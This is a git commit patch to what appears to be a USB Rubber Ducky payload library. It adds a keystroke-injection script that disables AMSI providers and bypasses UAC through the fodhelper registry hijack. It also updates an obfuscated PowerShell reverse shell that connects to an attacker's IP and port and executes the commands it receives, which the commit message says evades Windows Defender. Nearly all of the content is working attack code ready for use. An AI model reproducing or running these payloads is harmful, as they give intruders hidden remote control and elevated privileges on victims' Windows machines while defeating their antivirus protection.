From f3c751a0467ef7891f9b280b97bdb51cbf9da469 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 26 Aug 2021 19:17:31 +0200 Subject: [PATCH] Updated ReverseDucky to v. 1.1 (#17) * Uploaded ReverseDuckyII ReverseDucky2 - A faster way to gain a reverse shell & easier to configure Obfuscated Powershell code to bypass AMSI & Windows Defender. * Update ReverseDucky to v. 1.1 Updated ReverseDucky to version 1.1 - Shorten the code (Now faster than RDII) & still evade Defender. * Update ReverseDucky.txt * Create DuckyHelper UAC bypass for privilege escalation (Method FodHelper) --- payloads/library/execution/DuckyHelper | 47 +++++++++++++++++++ .../library/remote_access/ReverseDucky.txt | 41 +++++----------- 2 files changed, 60 insertions(+), 28 deletions(-) create mode 100644 payloads/library/execution/DuckyHelper diff --git a/payloads/library/execution/DuckyHelper b/payloads/library/execution/DuckyHelper new file mode 100644 index 0000000..ece26fa --- /dev/null +++ b/payloads/library/execution/DuckyHelper @@ -0,0 +1,47 @@ +REM DuckyHelper +REM Version 1.0 +REM OS: Windows 10 +REM Author: 0iphor13 + +REM UAC bypass for privilege escalation (Method FodHelper) +REM AV will notify, but payload will still be executed +REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD] + +DELAY 1500 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass +DELAY 250 +ENTER + +DELAY 200 +STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo +DELAY 100 +STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e +DELAY 100 +STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC +DELAY 100 +STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H +DELAY 100 +STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys +DELAY 100 +STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3;Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force +DELAY 100 +ENTER + +DELAY 5000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -Exec Bypass +DELAY 250 +ENTER + +DELAY 200 +STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force +DELAY 100 +ENTER + +DELAY 300 +STRING exit +DELAY 100 +ENTER diff --git a/payloads/library/remote_access/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky.txt index a3c4ff8..7492c1d 100644 --- a/payloads/library/remote_access/ReverseDucky.txt +++ b/payloads/library/remote_access/ReverseDucky.txt @@ -1,12 +1,11 @@ -# ReverseDucky -# Version 1.0 -# Author: 0iphor13 -# -# A Reverse shell executed in the background with powershell -# LINE 23 - Fill the IP blocks (*FIRST BLOCK* etc) - 192 | 168 | 178 | 33 -# LINE 25 - Change *PORT* to Port number -# DON'T FORGET TO START LISTENER +REM ReverseDucky +REM Version 1.1 +REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) +REM Author: 0iphor13 +REM Reverse shell executed in the background +REM Fill in Attacker IP & Port in line 18 +REM DON'T FORGET TO START LISTENER DELAY 1500 GUI r @@ -16,28 +15,14 @@ DELAY 250 ENTER DELAY 200 -STRING SeT-ITeM VARIABLE:Q528Yl ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT') ) ;${clie +STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl DELAY 200 -STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc +STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n DELAY 200 -STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'), +STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | . DELAY 200 -STRING PORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655 -DELAY 200 -STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt -DELAY 200 -STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1 -DELAY 200 -STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0 -DELAY 200 -STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc -DELAY 200 -STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI VaRiABLE:Q528YL )."vA -DELAY 200 -STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't -DELAY 200 -STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus -DELAY 200 -STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke() +STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0, DELAY 200 +STRING $sbt.Length);$S.Flush()};$C.Close() +DELAY 100 ENTER